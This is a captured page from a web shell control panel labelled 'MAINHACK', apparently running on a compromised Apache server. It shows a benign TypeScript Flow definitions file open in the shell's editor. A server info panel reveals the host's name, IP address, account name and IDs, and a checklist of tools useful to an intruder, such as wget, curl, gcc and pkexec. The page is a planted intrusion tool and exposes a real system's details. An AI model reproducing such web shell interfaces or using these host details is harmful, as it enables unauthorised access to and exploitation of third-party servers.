[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: flow.d.ts
// Type definitions for ESTree AST extensions for Facebook Flow // Project: https://github.com/estree/estree // Definitions by: RReverser <https://github.com/RReverser> // Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped declare namespace ESTree { interface FlowTypeAnnotation extends Node {} interface FlowBaseTypeAnnotation extends FlowTypeAnnotation {} interface FlowLiteralTypeAnnotation extends FlowTypeAnnotation, Literal {} interface FlowDeclaration extends Declaration {} interface AnyTypeAnnotation extends FlowBaseTypeAnnotation {} interface ArrayTypeAnnotation extends FlowTypeAnnotation { elementType: FlowTypeAnnotation; } interface BooleanLiteralTypeAnnotation extends FlowLiteralTypeAnnotation {} interface BooleanTypeAnnotation extends FlowBaseTypeAnnotation {} interface ClassImplements extends Node { id: Identifier; typeParameters?: TypeParameterInstantiation | null; } interface ClassProperty { key: Expression; value?: Expression | null; typeAnnotation?: TypeAnnotation | null; computed: boolean; static: boolean; } interface DeclareClass extends FlowDeclaration { id: Identifier; typeParameters?: TypeParameterDeclaration | null; body: ObjectTypeAnnotation; extends: Array<InterfaceExtends>; } interface DeclareFunction extends FlowDeclaration { id: Identifier; } interface DeclareModule extends FlowDeclaration { id: Literal | Identifier; body: BlockStatement; } interface DeclareVariable extends FlowDeclaration { id: Identifier; } interface FunctionTypeAnnotation extends FlowTypeAnnotation { params: Array<FunctionTypeParam>; returnType: FlowTypeAnnotation; rest?: FunctionTypeParam | null; typeParameters?: TypeParameterDeclaration | null; } interface FunctionTypeParam { name: Identifier; typeAnnotation: FlowTypeAnnotation; optional: boolean; } interface GenericTypeAnnotation extends FlowTypeAnnotation { id: Identifier | QualifiedTypeIdentifier; typeParameters?: TypeParameterInstantiation | null; } interface InterfaceExtends extends Node { id: Identifier | QualifiedTypeIdentifier; typeParameters?: TypeParameterInstantiation | null; } interface InterfaceDeclaration extends FlowDeclaration { id: Identifier; typeParameters?: TypeParameterDeclaration | null; extends: Array<InterfaceExtends>; body: ObjectTypeAnnotation; } interface IntersectionTypeAnnotation extends FlowTypeAnnotation { types: Array<FlowTypeAnnotation>; } interface MixedTypeAnnotation extends FlowBaseTypeAnnotation {} interface NullableTypeAnnotation extends FlowTypeAnnotation { typeAnnotation: TypeAnnotation; } interface NumberLiteralTypeAnnotation extends FlowLiteralTypeAnnotation {} interface NumberTypeAnnotation extends FlowBaseTypeAnnotation {} interface StringLiteralTypeAnnotation extends FlowLiteralTypeAnnotation {} interface StringTypeAnnotation extends FlowBaseTypeAnnotation {} interface TupleTypeAnnotation extends FlowTypeAnnotation { types: Array<FlowTypeAnnotation>; } interface TypeofTypeAnnotation extends FlowTypeAnnotation { argument: FlowTypeAnnotation; } interface TypeAlias extends FlowDeclaration { id: Identifier; typeParameters?: TypeParameterDeclaration | null; right: FlowTypeAnnotation; } interface TypeAnnotation extends Node { typeAnnotation: FlowTypeAnnotation; } interface TypeCastExpression extends Expression { expression: Expression; typeAnnotation: TypeAnnotation; } interface TypeParameterDeclaration extends Node { params: Array<Identifier>; } interface TypeParameterInstantiation extends Node { params: Array<FlowTypeAnnotation>; } interface ObjectTypeAnnotation extends FlowTypeAnnotation { properties: Array<ObjectTypeProperty>; indexers: Array<ObjectTypeIndexer>; callProperties: Array<ObjectTypeCallProperty>; } interface ObjectTypeCallProperty extends Node { value: FunctionTypeAnnotation; static: boolean; } interface ObjectTypeIndexer extends Node { id: Identifier; key: FlowTypeAnnotation; value: FlowTypeAnnotation; static: boolean; } interface ObjectTypeProperty extends Node { key: Expression; value: FlowTypeAnnotation; optional: boolean; static: boolean; } interface QualifiedTypeIdentifier extends Node { qualification: Identifier | QualifiedTypeIdentifier; id: Identifier; } interface UnionTypeAnnotation extends FlowTypeAnnotation { types: Array<FlowTypeAnnotation>; } interface VoidTypeAnnotation extends FlowBaseTypeAnnotation {} }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.7 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002